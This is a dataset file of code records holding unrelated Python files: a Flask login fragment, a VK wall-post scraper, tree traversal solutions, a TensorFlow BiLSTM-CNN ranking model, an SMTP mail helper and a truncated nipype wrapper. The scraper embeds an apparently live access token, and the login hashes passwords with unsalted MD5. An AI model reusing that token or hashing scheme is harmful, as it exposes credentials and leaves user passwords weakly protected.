(hashlib.md5(password)).hexdigest(): #hashing password and validating\n result = create_access_token(identity = {'first_name': rv['FIRST_NAME'],'last_name': rv['LAST_NAME'],'username': rv['USERNAME'],'email': rv['EMAIL_ID']})\n else:\n result = jsonify({\"error\":\"Invalid username and password\"})\n \n return result\n\n\n\nif __name__ == \"__main__\":\n app.run(host=\"localhost\", debug=True, port=5000)\n","sub_path":"server/src/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"358812737","text":"import requests\nimport pandas as pd\nfrom datetime import datetime\nimport time\n\ndef main_vk_request_wall(id_group, count_posts, filter):\n\n data = get_request_wall(id_group, count_posts, filter)\n data_posts = data['data']\n max_count_posts = data['max_count_posts']\n stats = processing_data_vk_posts(data_posts)\n vk_excel_url = data_to_excel(stats, id_group)\n\n return {'vk_excel_url': vk_excel_url, 'max_count_posts': max_count_posts}\n\n\n\n\ndef get_request_wall(id_group, count_posts, filter):\n token = 'af567951af567951af5679518caf3e98dfaaf56af567951f3270969be965f073f20981f'\n offset = 0\n count = 100\n data_posts = []\n max_count_posts = 0\n\n while offset < count_posts:\n\n url = 'https://api.vk.com/method/wall.get'\n params = {\n 'domain': id_group,\n 'filter': filter,\n 'count': count,\n 'offset': offset,\n 'access_token': token,\n 'v': 5.73\n }\n\n r = requests.get(url, params=params).json()\n\n check = True\n if check:\n max_count_posts = r['response']['count']\n if max_count_posts < count_posts:\n count_posts = max_count_posts\n check = False\n else:\n check = False\n\n data_posts += r['response']['items']\n offset += count\n time.sleep(0.5)\n\n return {'data': data_posts, 'max_count_posts': max_count_posts}\n\n\ndef processing_data_vk_posts(data_posts):\n stats = []\n\n for record in data_posts:\n title = record['text'].split('\\n')[0] # название поста берем символы до первого переноса\n if len(title) > 80: # я взял первые 80 символов из названия поста\n title = title[:80]\n\n len_title = len(record['text']) # вытаскиваем длинну текста\n len_title = len_title // 100 * 100 # для удобства групировки по кол-ву символов разбил на промежутки по 100, тоесть если длинна текста 200 это значит , что символов от 200 до 300\n\n date = datetime.fromtimestamp(record['date']).strftime('%Y-%m-%d') # вытаскиваем дату в формате ГГГГ-ММ-ДД\n hour = datetime.fromtimestamp(record['date']).strftime('%H') # вытаскиваем час\n\n attachment = {'photo': 0, 'audio': 0, 'video': 0, 'link': 0,\n 'poll': 0} # список из типов вложений. Я использовал самые популярные , если у вас другие типы вложений вы можете добавить их в список. 
Взять можно отсюда https://vk.com/dev/objects/attachments_w\n\n if 'attachments' in record: # цикл для подсчета типов и кол-ва вложений\n for attach in record['attachments']:\n if attach['type'] in attachment:\n attachment[attach['type']] = attachment[attach['type']] + 1\n\n if 'views' in record:\n views = record['views']['count']\n else:\n views = 0\n\n total_actions = record['comments']['count'] + record['likes']['count'] + record['reposts'][\n 'count'] # сумируем все активности\n\n # создаем список и добавляем в него название, длину, кол-во фото, кол-во аудио, кол-во видео в постах, постов с сылками, пстов с опросами, просмотры, кол-во просмотров, комментариев, лайков, репостов, сумму всех взаимодействий, дату и час\n stats.append(\n [title, len_title, attachment['photo'], attachment['audio'], attachment['video'], attachment['link'],\n attachment['poll'], views, record['comments']['count'], record['likes']['count'],\n record['reposts']['count'], total_actions, date, hour])\n\n return stats\n\ndef data_to_excel(stats, id_group):\n # Создаем DataFrame (таблицу) из данных и записываем\n columns = [\"name_post\", 'len_text', 'photo', 'audio', 'video', 'link', 'poll', \"views\", \"comments\", \"likes\",\n \"share\", 'total_action', \"date\", \"hour\"] # задаем заголовки таблицы\n df = pd.DataFrame(data=stats, columns=columns)\n\n # групировка таблиц по часам и удаление не нужных столбцов\n df_hour = df.drop(['len_text', 'photo', 'audio', 'video', 'link', 'poll'], axis=1)\n df_group_by_hour = df_hour.groupby('hour').sum() # группируем значения по часу\n df_group_by_hour['count_post'] = df_hour.groupby('hour')[\n 'name_post'].count() # считаем колличесво постов вышедших в данный час\n df_group_by_hour['mean_action'] = df_group_by_hour['total_action'] / df_group_by_hour[\n 'count_post'] # считаем среднее значение активности (все активности / кол-во активностей)\n df_group_by_hour['views_on_post'] = df_group_by_hour['views'] / df_group_by_hour['count_post']\n df_group_by_hour['er'] = df_group_by_hour['total_action'] / df_group_by_hour[\n 'views'] * 100 # считаем ER (все активности / кол-во просмотров * 100)\n df_group_by_hour = df_group_by_hour.sort_values(by=\"er\", ascending=False) # сортируем по ER\n\n # групировка таблиц по типам и удаление не нужных столбцов\n df_type = df.drop(['date', 'hour'], axis=1)\n df_group_by_len_title = df_type.groupby('len_text').sum()\n df_group_by_len_title['count_posts'] = df_type.groupby('len_text')['name_post'].count()\n df_group_by_len_title['mean_action'] = df_group_by_len_title['total_action'] / df_group_by_len_title['count_posts']\n df_group_by_len_title['views_on_post'] = df_group_by_len_title['views'] / df_group_by_len_title['count_posts']\n df_group_by_len_title['er'] = df_group_by_len_title['total_action'] / df_group_by_len_title['views'] * 100\n df_group_by_len_title = df_group_by_len_title.sort_values(by='views', ascending=False)\n df_group_by_len_title = df_group_by_len_title.style.format(\"{:.2f}\")\n\n # запись в excel файл\n record_url_xlsx = 'static/data_vk_{}.xlsx'.format(id_group)\n with pd.ExcelWriter(record_url_xlsx) as writer:\n df.to_excel(writer, index=False, sheet_name='Исходный DataFrame')\n df_group_by_hour.to_excel(writer, index=True, sheet_name='Групировка по часу')\n df_group_by_len_title.to_excel(writer, index=True, sheet_name='Гр��пировка по кол-ву символов')\n for atach in ['photo', 'audio', 'video', 'link', 'poll']:\n df_group_by_temp = df_type.groupby(atach).sum()\n df_group_by_temp = df_group_by_temp.loc[:, [\"views\", 
\"comments\", \"likes\", \"share\", 'total_action']]\n df_group_by_temp['count_posts'] = df_type.groupby(atach)['name_post'].count()\n df_group_by_temp['mean_action'] = df_group_by_temp['total_action'] / df_group_by_temp['count_posts']\n df_group_by_temp['views_on_post'] = df_group_by_temp['views'] / df_group_by_temp['count_posts']\n df_group_by_temp['er'] = df_group_by_temp['total_action'] / df_group_by_temp['views'] * 100\n df_group_by_temp = df_group_by_temp.sort_values(by='er', ascending=False)\n df_group_by_temp = df_group_by_temp.style.format(\"{:.2f}\")\n sheet_name = 'Групировка по ' + atach\n df_group_by_temp.to_excel(writer, index=True, sheet_name=sheet_name)\n\n return record_url_xlsx","sub_path":"vk_create_request/vk_wall_get.py","file_name":"vk_wall_get.py","file_ext":"py","file_size_in_byte":7986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"362797514","text":"\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\"\"\"\n\n# dfs solution\nclass Solution:\n \"\"\"\n @param: root: A Tree\n @return: Inorder in ArrayList which contains node values.\n \"\"\"\n\n def inorderTraversal(self, root):\n # write your code here\n self.result = []\n self.helper(root)\n return self.result\n\n # @return: None\n def helper(self, root):\n if root is None:\n return\n\n self.helper(root.left)\n self.result.append(root.val)\n self.helper(root.right)\n\n# iterative solution !!\nclass Solution:\n \"\"\"\n @param: root: A Tree\n @return: Inorder in ArrayList which contains node values.\n \"\"\"\n\n def inorderTraversal(self, root):\n # write your code here\n stack = []\n result = []\n cur = root\n while cur or stack:\n # push all left into stack\n while cur:\n stack.append(cur)\n cur = cur.left\n\n # push left out, add it to result\n cur = stack.pop()\n result.append(cur.val)\n\n # push the node's right into stack\n cur = cur.right\n\n return result\n","sub_path":"lintcode/树/67-binary-tree-inorder-traversal.py","file_name":"67-binary-tree-inorder-traversal.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"384115590","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport os\n\n\nclass TextCNN():\n def __init__(self, dataset, filter_numbers, sentence_length,lstm_n_hidden, lstm_n_layer, cnn_layer_size_list,\n learn_rate, epochs, batch_size, dropout_pro):\n tf.reset_default_graph()\n\n '''\n 0. init variable\n '''\n self.name = str(filter_numbers) + '_' + str(lstm_n_hidden) + '+' + str(cnn_layer_size_list) + '+' + str(\n learn_rate) + '_' + str(batch_size) + '_' + str(dropout_pro) + '+++'\n self.name = self.name.replace('[', '').replace(']', '')\n self.learning_rate = learn_rate\n self.epochs = epochs\n self.seq_length = sentence_length\n self.filter_numbers = filter_numbers\n self.batch_size = batch_size\n self.dropout_pro_item = dropout_pro\n self.embedding_dim = len(dataset.zh_embedding_matrix[0])\n self.zh_vocab_size = len(dataset.zh_embedding_matrix)\n self.en_vocab_size = len(dataset.en_embedding_matrix)\n self.lstm_n_hidden = lstm_n_hidden\n self.lstm_n_layer = lstm_n_layer\n self.cnn_layer_size = cnn_layer_size_list\n\n self.dataset = dataset\n self.keep_prob = tf.placeholder(tf.float32)\n\n '''\n 1. input layer\n '''\n #\n self.input_zh = tf.placeholder(tf.int32, shape=[None, sentence_length])\n self.input_pos = tf.placeholder(tf.int32, shape=[None, sentence_length])\n self.input_neg = tf.placeholder(tf.int32, shape=[None, sentence_length])\n\n # self.input_en_image = tf.placeholder()\n\n self.zh_seq_len = tf.placeholder(tf.int32, shape=[None])\n self.pos_seq_len = tf.placeholder(tf.int32, shape=[None])\n self.neg_seq_len = tf.placeholder(tf.int32, shape=[None])\n\n self.zh_dict_vec = tf.placeholder(shape=[self.zh_vocab_size, self.embedding_dim],\n dtype=tf.float32)\n self.en_dict_vec = tf.placeholder(shape=[self.en_vocab_size, self.embedding_dim],\n dtype=tf.float32)\n\n '''\n 2. embedding layer\n '''\n with tf.name_scope('embedding_layer'):\n embeddings_zh = tf.nn.embedding_lookup(self.zh_dict_vec, self.input_zh)\n embeddings_pos = tf.nn.embedding_lookup(self.en_dict_vec, self.input_pos)\n embeddings_neg = tf.nn.embedding_lookup(self.en_dict_vec, self.input_neg)\n\n '''\n 3. 
use BiLSTM to zh and pos/neg \n hiddens = [batch_size, seq_length, n_hiddens]\n '''\n # zh forward and backward lstm\n zh_lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n zh_lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n\n # en(pos/neg) backward layer\n en_lstm_fw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n en_lstm_bw_cell = tf.contrib.rnn.BasicLSTMCell(num_units=lstm_n_hidden, forget_bias=1.0)\n\n with tf.variable_scope(\"zh_bilstm\", reuse=None) as scope:\n hiddens_zh, state_zh = tf.nn.bidirectional_dynamic_rnn(cell_fw=zh_lstm_fw_cell,\n cell_bw=zh_lstm_bw_cell,\n inputs=embeddings_zh,\n sequence_length=self.zh_seq_len,\n dtype=tf.float32)\n hiddens_zh = tf.concat(hiddens_zh, axis=2)\n\n with tf.variable_scope(\"en_bilstm\", reuse=None) as scope:\n hiddens_pos, state_pos = tf.nn.bidirectional_dynamic_rnn(cell_fw=en_lstm_fw_cell,\n cell_bw=en_lstm_bw_cell,\n inputs=embeddings_pos,\n sequence_length=self.pos_seq_len,\n dtype=tf.float32)\n hiddens_pos = tf.concat(hiddens_pos, axis=2)\n\n with tf.variable_scope(\"en_bilstm\", reuse=True) as scope:\n hiddens_neg, state_neg = tf.nn.bidirectional_dynamic_rnn(cell_fw=en_lstm_fw_cell,\n cell_bw=en_lstm_bw_cell,\n inputs=embeddings_neg,\n sequence_length=self.neg_seq_len,\n dtype=tf.float32)\n\n hiddens_neg = tf.concat(hiddens_neg, axis=2)\n\n '''\n 4. concat zh outputs and pos/neg outputs\n '''\n self.pos_concat = tf.concat([hiddens_zh, hiddens_pos], -1)\n self.neg_concat = tf.concat([hiddens_zh, hiddens_neg], -1)\n self.pos_concat = tf.expand_dims(self.pos_concat, -1)\n self.neg_concat = tf.expand_dims(self.neg_concat, -1)\n\n '''\n 5. conv layer + maxpool layer for each filer size\n '''\n pool_layer_list_pos = []\n pool_layer_list_neg = []\n W_list = []\n b_list = []\n # convolutio layer\n for layer in cnn_layer_size_list:\n filter_shape = [layer, self.lstm_n_hidden * 4, 1, filter_numbers]\n W_list.append(tf.Variable(tf.truncated_normal(filter_shape, stddev=0.1), name='filter_weight'))\n b_list.append(tf.Variable(tf.constant(0.1, shape=[filter_numbers]), name='filter_bias'))\n\n for W, b, filter_size in zip(W_list, b_list, cnn_layer_size_list):\n max_pool_layer_pos = self.__add_conv_layer(self.pos_concat, W, b, filter_size)\n pool_layer_list_pos.append(max_pool_layer_pos)\n max_pool_layer_neg = self.__add_conv_layer(self.neg_concat, W, b, filter_size)\n pool_layer_list_neg.append(max_pool_layer_neg)\n\n '''\n 6. 
full connect droput + softmax + l2\n '''\n # combine all the max pool —— feature\n with tf.name_scope('dropout_layer'):\n max_num = len(cnn_layer_size_list) * self.filter_numbers\n\n h_pool_pos = tf.concat(pool_layer_list_pos, name='last_pool_layer', axis=3)\n pool_layer_flat_pos = tf.reshape(h_pool_pos, [-1, max_num], name='pool_layer_flat')\n dropout_pro_layer_pos = tf.nn.dropout(pool_layer_flat_pos, self.keep_prob, name='dropout')\n\n h_pool_neg = tf.concat(pool_layer_list_neg, name='last_pool_layer', axis=3)\n pool_layer_flat_neg = tf.reshape(h_pool_neg, [-1, max_num], name='pool_layer_flat')\n dropout_pro_layer_neg = tf.nn.dropout(pool_layer_flat_neg, self.keep_prob, name='dropout')\n\n with tf.name_scope('full_con_layer'):\n self.l2_loss = 0\n num_out = 1\n SoftMax_W = tf.Variable(tf.truncated_normal([max_num, num_out], stddev=0.01), name='softmax_linear_weight')\n SoftMax_b = tf.Variable(tf.constant(0.1, shape=[num_out]), name='softmax_linear_bias')\n self.l2_loss += tf.nn.l2_loss(SoftMax_W)\n self.l2_loss += tf.nn.l2_loss(SoftMax_b)\n self.softmax_values_pos = tf.nn.xw_plus_b(dropout_pro_layer_pos, SoftMax_W, SoftMax_b,\n name='soft_values')\n self.softmax_values_neg = tf.nn.xw_plus_b(dropout_pro_layer_neg, SoftMax_W, SoftMax_b,\n name='soft_values')\n\n self.score_pos = self.softmax_values_pos\n self.score_neg = self.softmax_values_neg\n\n '''\n 7. calculate loss\n '''\n with tf.name_scope('loss'):\n self.margin = tf.placeholder(tf.float32)\n self.loss = tf.reduce_sum(tf.maximum(0.0, self.margin - self.score_pos + self.score_neg))\n\n '''\n 8. calcalate accuarcy\n '''\n with tf.name_scope('accuracy'):\n self.acc = tf.reduce_mean(tf.maximum(tf.sign(self.score_pos - self.score_neg), 0.))\n\n '''\n 9. use optimizer\n '''\n with tf.name_scope('train'):\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss)\n\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n self.session = tf.Session()\n self.saver = tf.train.Saver()\n\n def __add_conv_layer(self, concat, W, b, filter_size):\n with tf.name_scope('conv_maxpool_layer'):\n # 参数说明\n # 第一个参数input:指需要做卷积的输入图像 [训练时一个batch的图片数量, 图片高度, 图片宽度, 图像通道数]\n # 第二个参数filter:相当于CNN中的卷积核 [卷积核的高度,卷积核的宽度,图像通道数,卷积核个数]\n # 第三个参数strides:卷积时在图像每一维的步长,这是一个一维的向量,长度4,\n # 第四个参数padding:string类型的量,只能是\"SAME\",\"VALID\"其中之一,这个值决定了不同的卷积方式\n # 第五个参数:use_cudnn_on_gpu: bool类型,是否使用cudnn加速,默认为true\n conv_layer = tf.nn.conv2d(concat, W, strides=[1, 1, 1, 1], padding='VALID',\n name='conv_layer')\n relu_layer = tf.nn.relu(tf.nn.bias_add(conv_layer, b), name='relu_layer')\n\n max_pool_layer = tf.nn.max_pool(relu_layer, ksize=[1, self.seq_length - filter_size + 1, 1, 1],\n strides=[1, 1, 1, 1], padding='VALID', name='maxpool')\n return max_pool_layer\n\n def train(self):\n os.mkdir('./model/' + self.name)\n f = open('./log/' + self.name + 'log_train.txt', 'w')\n self.session.run(tf.global_variables_initializer())\n # self.session = tf_debug.LocalCLIDebugWrapperSession(sess=self.session)\n # 迭代训练\n min_loss = 9999999\n max_acc = 0.0\n for epoch in range(self.epochs):\n train_batch = self.dataset.get_train_batch(self.batch_size)\n feed = {\n self.input_zh: train_batch[5][0],\n self.input_pos: train_batch[5][1],\n self.input_neg: train_batch[5][2],\n self.zh_seq_len: train_batch[5][3],\n self.pos_seq_len: train_batch[5][4],\n self.neg_seq_len: train_batch[5][5],\n self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n self.en_dict_vec: self.dataset.en_embedding_matrix,\n self.margin: 1.0,\n self.keep_prob: 
self.dropout_pro_item\n            }\n            _, loss, accuracy, s_pos, s_neg = self.session.run(\n                [self.optimizer, self.loss, self.acc, self.score_pos, self.score_neg], feed_dict=feed)\n            f.write('Epoch {:>3} train_loss = {} accuracy = {}\\n'.format(epoch, loss, accuracy))\n            if epoch % 50 == 0:\n                print('Epoch {:>3} train_loss = {} accuracy = {}'.format(epoch, loss, accuracy))\n            if accuracy > max_acc:\n                print('updating best model')\n                if accuracy != 1.0:\n                    max_acc = accuracy\n                    min_loss = loss\n                self.saver.save(self.session,\n                                './model/' + self.name + '/' + str(epoch) + '_' + str(loss) + '_' + str(accuracy) + '.ckpt')\n                # deterministic name so test() can restore the latest best checkpoint\n                self.saver.save(self.session, './model/' + self.name + '/last_epoch.ckpt')
\n\n    def val(self, epoch):\n        val_batch_data, val_abs_data = self.dataset.get_val_data(batch_size=129)\n        acc_top1 = 0.\n        acc_top10 = 0.\n\n        for j in range(len(val_batch_data)):\n            score = self.session.run(self.score_pos, feed_dict={\n                self.input_zh: val_abs_data[j][0],\n                self.input_pos: val_abs_data[j][2],\n                self.zh_seq_len: val_abs_data[j][1],\n                self.pos_seq_len: val_abs_data[j][3],\n                self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n                self.en_dict_vec: self.dataset.en_embedding_matrix,\n                self.keep_prob: 1.0,\n                self.margin: 1.0})\n\n            assert len(score) == 100\n            n = 0\n            for k in range(1, 100):\n                if score[0] <= score[k]:  # higher score is better\n                    n += 1\n            if n == 0:\n                acc_top1 += 1\n            if n < 10:\n                acc_top10 += 1\n        acc_top1 = float(acc_top1) / float(len(val_batch_data))\n        acc_top10 = float(acc_top10) / float(len(val_batch_data))\n        print(\"epoch = {} val top 1 acc = {} val top 10 acc = {}\".format(epoch, acc_top1, acc_top10))\n\n        return acc_top1
\n\n    def test(self, model_name):\n        test_batch_data, test_abs_data = self.dataset.get_test_data()\n        acc_top1 = 0.\n        acc_top10 = 0.\n\n        self.saver.restore(self.session, './model/' + self.name + '/' + model_name + '.ckpt')\n\n        f = open('./log/' + self.name + '_' + model_name + '_log_test.txt', 'w')\n\n        for j in range(len(test_batch_data)):\n            score = self.session.run(self.score_pos, feed_dict={\n                self.input_zh: test_abs_data[j][0],\n                self.input_pos: test_abs_data[j][2],\n                self.input_zh_title: test_abs_data[j][4],\n                self.input_pos_title: test_abs_data[j][5],\n                self.zh_seq_len: test_abs_data[j][1],\n                self.pos_seq_len: test_abs_data[j][3],\n                self.zh_dict_vec: self.dataset.zh_embedding_matrix,\n                self.en_dict_vec: self.dataset.en_embedding_matrix,\n                self.keep_prob: 1.0,\n                self.margin: 1.0})\n            assert len(score) == 100\n\n            f.write('batch :' + str(j) + '\\n')\n            print('batch :' + str(j))\n            f.write('score[0]: ' + str(score[0]) + '\\n')\n            print('score[0]: ' + str(score[0]))\n\n            n = 0\n            for k in range(1, 100):\n                if score[0] <= score[k]:  # higher score is better\n                    n += 1\n                    print(str(score[k]))\n\n                    f.write(str(score[k]) + '\\n')\n\n            if n == 0:\n                acc_top1 += 1\n                print(acc_top1)\n            if n < 10:\n                acc_top10 += 1\n                print(acc_top10)\n\n            f.write('\\n')\n            print('')\n\n        f.write('acc_top1=' + str(acc_top1) + ' acc_top10=' + str(acc_top10) + ' len(test_batch_data)=' + str(len(test_batch_data)))\n        print('acc_top1=' + str(acc_top1) + ' acc_top10=' + str(acc_top10) + ' len(test_batch_data)=' + str(len(test_batch_data)))\n\n        acc_top1 = float(acc_top1) / float(len(test_batch_data))\n        acc_top10 = float(acc_top10) / float(len(test_batch_data))\n        f.write(\"test top 1 acc = {} test top 10 acc = {}\".format(acc_top1, acc_top10))\n        f.close()\n        print(\"test top 1 acc = {} test top 10 acc = {}\".format(acc_top1, acc_top10))\n\n    def close(self):\n        self.session.close()
\n\n\nif __name__ == '__main__':\n    # step 1: load data\n    print(\"Loading training and validation data...\")\n    dataset = DataSet.DataSet()\n\n    print('Configuring CNN model...')\n    # step 2: create TextCNN model\n    text_cnn = TextCNN(dataset=dataset,\n                       filter_numbers=128,\n                       sentence_length=100,\n                       lstm_n_hidden=64,\n                       lstm_n_layer=3,\n                       cnn_layer_size_list=[3, 4, 5],\n                       learn_rate=1e-3,\n                       epochs=5000,\n                       batch_size=256,\n                       dropout_pro=0.6)\n    # step 3: start training\n    text_cnn.train()\n    # step 4: test (restores the 'last_epoch' checkpoint saved at the end of training)\n    text_cnn.test('last_epoch')\n\n    text_cnn.close()","sub_path":"BiLSTM_TextCNN/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":16166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
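The val()/test() routines in the record above rank one positive candidate (score index 0) against 99 negatives and count how often the positive survives. A standalone sketch of that top-1/top-10 rule, with made-up demo scores (the helper name topk_hits is illustrative, not from the original file):

import numpy as np

def topk_hits(scores):
    # scores[0] is the positive pair, scores[1:] are negatives; higher is better
    n_better = sum(1 for s in scores[1:] if scores[0] <= s)
    return n_better == 0, n_better < 10  # (top-1 hit, top-10 hit)

scores = np.random.rand(100)
scores[0] = 0.99  # make the positive strong for the demo
print(topk_hits(scores))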
+{"seq_id":"508210397","text":"#!usr/bin/env python\r\n# -*- coding: utf8 -*-\r\n#\r\n#Created on 2015-04-12\r\n#author: ryanrmeng\r\n#\r\n################################################################################\r\nimport logging\r\nimport smtplib\r\nimport os\r\nimport app_config\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\nfrom app_config import smtp_mail_acc\r\n\r\n# 有些服务器强制要求TLS加密,需要在login前设置TLS模式,添加代码:\r\n# smtp.ehlo() # 向服务器发送ehlo命令\r\n# smtp.starttls() # 启用TLS加密模式,部分SMTP服务器强制要求\r\ndef send_mail(send_to, subject, html_body, send_cc=None, send_bcc=None):\r\n send_from = '%s<%s@%s>' % (smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_USER,\r\n smtp_mail_acc.MAIL_DOMAIN)\r\n # Create message container - MIME type is multipart/alternative\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = send_from\r\n msg['To'] = ';'.join(send_to)\r\n if send_cc:\r\n msg['Cc'] = ';'.join(send_cc)\r\n if send_bcc:\r\n msg['Bcc'] = ';'.join(send_bcc)\r\n \r\n msg_body = MIMEText(html_body, 'html')\r\n msg.attach(msg_body)\r\n \r\n with smtplib.SMTP(smtp_mail_acc.SMTP_HOST, smtp_mail_acc.SMTP_PORT) as smtp:\r\n smtp.login(smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_PASS)\r\n if send_cc:\r\n smtp.sendmail(send_from, send_to+send_cc+send_bcc, msg.as_string())\r\n else:\r\n smtp.sendmail(send_from, send_to, msg.as_string())\r\n \r\n smtp.quit()\r\n\r\ndef send_mail_attach(send_to, subject, html_body, filelist, send_cc=None, send_bcc=None):\r\n send_from = '%s<%s@%s>' % (smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_USER,\r\n smtp_mail_acc.MAIL_DOMAIN)\r\n # Create message container - MIME type is multipart/alternative\r\n msg = MIMEMultipart('alternative')\r\n msg['Subject'] = subject\r\n msg['From'] = send_from\r\n msg['To'] = ';'.join(send_to)\r\n if send_cc:\r\n msg['Cc'] = ';'.join(send_cc)\r\n if send_bcc:\r\n msg['Bcc'] = ';'.join(send_bcc)\r\n\r\n msg_body = MIMEText(html_body, 'html')\r\n msg.attach(msg_body)\r\n\r\n #add acctch file\r\n for name in filelist:\r\n attach(msg, name)\r\n\r\n with smtplib.SMTP(smtp_mail_acc.SMTP_HOST, smtp_mail_acc.SMTP_PORT) as smtp:\r\n smtp.login(smtp_mail_acc.MAIL_USER, smtp_mail_acc.MAIL_PASS)\r\n if send_cc:\r\n smtp.sendmail(send_from, send_to+send_cc+send_bcc, msg.as_string())\r\n else:\r\n smtp.sendmail(send_from, send_to, msg.as_string())\r\n \r\n smtp.quit()\r\n\r\ndef attach(msg, filename):\r\n full_filename = os.path.join(app_config.attachDir, filename)\r\n name = os.path.basename(full_filename)\r\n att = MIMEText(open(full_filename.encode(\"gbk\"), 'rb').read(), 'base64', 'gb2312')\r\n att[\"Content-Type\"] = 'application/octet-stream'\r\n att[\"Content-Disposition\"] = 'attachment; filename=\"%s\"' % (name)\r\n msg.attach(att)\r\n\r\nif __name__ == '__main__':\r\n print('Unit Test Begin!')\r\n logging.basicConfig(level=logging.DEBUG,\r\n format='%(asctime)s %(filename)s:%(lineno)d [%(levelname)s] %(message)s',\r\n datefmt='%Y-%m-%d %H:%M:%S',\r\n filename=str(general_utils.get_log_path().joinpath('send_mail.log')),\r\n filemode='a')\r\n logging.getLogger().addHandler(logging.StreamHandler())\r\n \r\n send_mail(['123@qq.com'],\r\n 'Good Morning :)', 'Hello body!')\r\n \r\n print('Unit Test End!')\r\n","sub_path":"sendmail/send_mail.py","file_name":"send_mail.py","file_ext":"py","file_size_in_byte":3602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"274854700","text":"from nipype.interfaces.base import TraitedSpec, File, Directory, traits, CommandLineInputSpec, CommandLine\nfrom glob import glob\nimport os\n\ndef get_value(key, dict):\n return dict[key]\n\ndef concat_dirs(dir1, dir2):\n import os\n return os.path.join(dir1, 'BLSA_'+dir2)\n\nclass PipelineWrapperInputSpec(CommandLineInputSpec):\n pet4D = File(desc=\"path to 4D PET image\", exists=True, mandatory=True, position=0, argstr=\"%s\")\n pettiming = File(desc=\"path to csv file describing PET timing info\", exists=True, mandatory=True, position=1, argstr=\"%s\")\n mri = File(desc=\"path to preprocessed MRI image without skull\", exists=True, mandatory=True, position=3, argstr=\"%s\")\n label = File(desc=\"path to anatomical label image (in MRI space)\", exists=True, mandatory=True, position=4, argstr=\"%s\")\n mnitransform = File(desc=\"path to composite (deformable) transform that takes MRI to MNI space\", exists=True, mandatory=True, position=5, argstr=\"%s\")\n outputdir = Directory(desc=\"output directory\", exists=False, mandatory=True, position=6, argstr=\"%s\")\n\n t_start = traits.Float(desc=\"Frames prior to t_start (in min) will be excluded from analysis\",\n mandatory=False, argstr=\"--t_start %f\")\n t_end_realign = traits.Float(desc=\"Time frame alignment will use the average of frames prior to t_end_realign (in min) as the target\",\n mandatory=False, argstr=\"--t_end_realign %f\")\n t_end_coreg = traits.Float(desc=\"MRI coregistration will use the average of the frames prior to t_end_coreg (in min) as the source\",\n mandatory=False, argstr=\"--t_end_coreg %f\")\n t_end_EA = traits.Float(desc=\"early amyloid image will be computed as the average of frames prior to t_end_EA (in min)\",\n mandatory=False, argstr=\"--t_end_EA %f\")\n t_end_kinetic_model = traits.Float(desc=\"Parametric images will be computed as the average of frames between t_start and t_end_kinetic_model (in min)\",\n mandatory=False, argstr=\"--t_end_kinetic_model %f\")\n t_start_SUVR = traits.Float(desc=\"SUVR image will be computed as the average of frames between t_start_SUVR and t_end_SUVR (in min)\",\n mandatory=False, argstr=\"--t_start_SUVR %f\")\n t_end_SUVR = traits.Float(desc=\"SUVR image will be computed as the average of frames between t_start_SUVR and t_end_SUVR (in min)\",\n mandatory=False, argstr=\"--t_end_SUVR %f\")\n no_pvc = traits.Bool(desc=\"if True, do not perform partial volume correction (default is to perform partial volume correction)\",\n mandatory=False, argstr=\"--no_pvc\")\n psf_fwhm_x = traits.Float(desc=\"PET scanner PSF FWHM along x (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_x %f\")\n psf_fwhm_y = traits.Float(desc=\"PET scanner PSF FWHM along y (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_y %f\")\n psf_fwhm_z = traits.Float(desc=\"PET scanner PSF FWHM along z (in mm)\",\n mandatory=False, argstr=\"--psf_fwhm_z %f\")\n smooth_fwhm = traits.Float(desc=\"FWHM of Gaussian smoothing filter (in mm)\",\n mandatory=False, argstr=\"--smooth_fwhm %f\")\n n_procs = traits.Int(desc=\"number of parallel processes\", mandatory=False,\n argstr=\"--n_procs %d\")\n\nclass PipelineWrapperOutputSpec(TraitedSpec):\n dvr_xlsx = File(desc=\"DVR spreadsheet\", exists=True)\n dvr_pvc_xlsx = File(desc=\"DVR spreadsheet (with PVC)\", exists=True)\n\n r1_xlsx = File(desc=\"R1 spreadsheet\", exists=True)\n r1_pvc_xlsx = File(desc=\"R1 spreadsheet (with PVC)\", exists=True)\n\n r1_lrsc_xlsx = File(desc=\"R1 LRSC spreadsheet\", exists=True)\n r1_lrsc_pvc_xlsx = 
